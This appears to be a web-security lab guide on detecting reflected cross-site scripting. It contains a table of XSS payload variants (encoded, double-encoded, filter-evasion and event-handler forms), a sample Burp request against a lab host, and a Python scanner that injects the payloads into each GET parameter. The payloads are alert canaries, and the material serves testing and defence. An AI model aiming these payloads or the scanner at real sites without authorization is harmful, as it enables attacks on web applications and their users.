1) Detection method:
Crawl the GET pages and substitute the test vector <script>alert(a1b2c3d4e5)</script> into each URL parameter in turn.
A parameter is flagged when the response status is 200 and the string <script>alert(a1b2c3d4e5)</script> appears unchanged in the response body. Note that this only shows the value is reflected without output encoding; whether the script actually executes depends on the HTML context it lands in, so confirm the finding in a browser.
2) Test vectors:
Injected | Returned |
%3E%22%27%3E%3Cscript%3Ealert%289776%29%3C%2Fscript%3E | <script>alert(9776)</script> |
<script>alert(1214)</script> | <script>alert(1214)</script> |
;</script><script>alert(1350)</script> | <script>alert(1350)</script> |
%3Cscript%3Ealert%28514%29%3C%2Fscript%3E | <script>alert(514)</script> |
"/><script>alert(10364)</script> | <script>alert(10364)</script> |
";</script><script>alert(1300)</script> | <script>alert(1300)</script> |
%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%286431%29%3C%2Fscript%3E | <script>alert(6431)</script> |
%22onmouseover%3D%22alert%281101%29%22 | onmouseover="alert(1101)" |
%22%20onmouseover=%22alert%283870%29%22%20 | onmouseover="alert(3870)" |
-->";</script><script>alert(6837)</script> | <script>alert(6837)</script> |
;;"";;alert(3868);; | alert(3868) |
--%3E%3C/script%3E%3Cscript%3Ealert(3880)%3C/script%3E | <script>alert(3880)</script> |
%00--%3E%3C/script%3E%3Cscript%3Ealert(3882)%3C/script%3E | <script>alert(3882)</script> |
%3Cscript%3Ealert(3884)%3C/script%3E | <script>alert(3884)</script> |
%3cimg%20src%3d%22javascript%3aalert(3888)%22%3e | alert(3888) |
%253E%2527%2522%253E%253Cscript%253Ealert%25283907%2529%253C%252Fscript%253E | <script>alert(3907)</script> |
<script>alert(String.fromCharCode(88,83,83))</script> | <script>alert(String.fromCharCode(88,83,83))</script> |
<scRipt>alert(123)</scriPt> | <scRipt>alert(123)</scriPt> |
<s<script>cript>alert(123)</s</script>cript> | <script>alert(123)</script> |
<img src=1 onerror=alert(123)> | <img src=1 onerror=alert(123)> |
<script>prompt(123)</script> | <script>prompt(123)</script> |
"method="POST"><script>alert(123)</script> | "method="POST"><script>alert(123)</script> |
" onsubmit="alert('123') | " onsubmit="alert('123') |
3) Example:
Visit the link http://192.168.2.160/xss_kuazhan/xss_get1.php?username=test
and capture the request with Burp Suite:
GET /xss_kuazhan/xss_get1.php?username=test HTTP/1.1
Host: 192.168.2.160
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.160/
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Change the username parameter to username=<script>alert(a1b2c3d4e5)</script>, send the modified request on, and the browser shows an alert dialog containing a1b2c3d4e5.
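The detection method in 1) and the manual walk-through in 3) are the same procedure: put the canary payload into one GET parameter at a time and look for it coming back verbatim in a 200 response. The following is an added example that automates exactly that check; it is not code from the original page or from the lab it describes. `fake_lab_server` is a constructed offline stand-in for xss_get1.php (it echoes `username` raw and a hypothetical `page` parameter HTML-escaped, so the scanner has one hit and one non-hit to distinguish); `fetch` is the live HTTP fetcher you would pass instead against a real target.

```python
"""Reflected-XSS probe, following the method on this page: put a marker
payload into each GET parameter in turn and flag parameters whose
200 response contains the payload verbatim (i.e. unencoded)."""
import html
import urllib.error
import urllib.request
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

CANARY = "a1b2c3d4e5"
PAYLOAD = f"<script>alert({CANARY})</script>"


def build_probe_urls(url, payload=PAYLOAD):
    """Yield (param_name, probe_url), replacing one query parameter at a time."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    for i, (name, _value) in enumerate(params):
        mutated = list(params)
        mutated[i] = (name, payload)  # urlencode percent-encodes < > ( ) / for the wire
        yield name, urlunsplit(parts._replace(query=urlencode(mutated)))


def is_reflected(status, body, payload=PAYLOAD):
    """The page's criterion: HTTP 200 and the payload string present as sent.
    An HTML-escaped echo (&lt;script&gt;...) does not match, which is the point."""
    return status == 200 and payload in body


def fetch(url):
    """Live fetcher for a real target: returns (status, body).
    Not exercised by the offline demo below."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def scan(url, fetcher=fetch, payloads=(PAYLOAD,)):
    """Return [(param, payload)] for every parameter/payload pair that reflects."""
    hits = []
    for payload in payloads:
        for name, probe in build_probe_urls(url, payload):
            status, body = fetcher(probe)
            if is_reflected(status, body, payload):
                hits.append((name, payload))
    return hits


# Constructed stand-in for the lab page (not the real xss_get1.php): echoes
# `username` raw, which is the reflected-XSS bug, and a hypothetical `page`
# parameter HTML-escaped, which is the safe behaviour.
def fake_lab_server(url):
    params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    body = (
        "<html><body>Hello " + params.get("username", "")
        + "<p>page=" + html.escape(params.get("page", "")) + "</p></body></html>"
    )
    return 200, body


if __name__ == "__main__":
    target = "http://192.168.2.160/xss_kuazhan/xss_get1.php?username=test&page=1"
    for param, payload in scan(target, fetcher=fake_lab_server):
        print(f"reflected unencoded: param={param!r} payload={payload!r}")
    # Against a live target, drop the fetcher argument: scan(target) uses fetch().
```

Passing the other vectors from the table in 2) as `payloads` turns this into the multi-vector sweep the table records; `is_reflected` deliberately compares the decoded payload, so a double-encoded input such as the %253E... vector counts as a hit only if the server decodes it back to the raw tags, as the table shows it did.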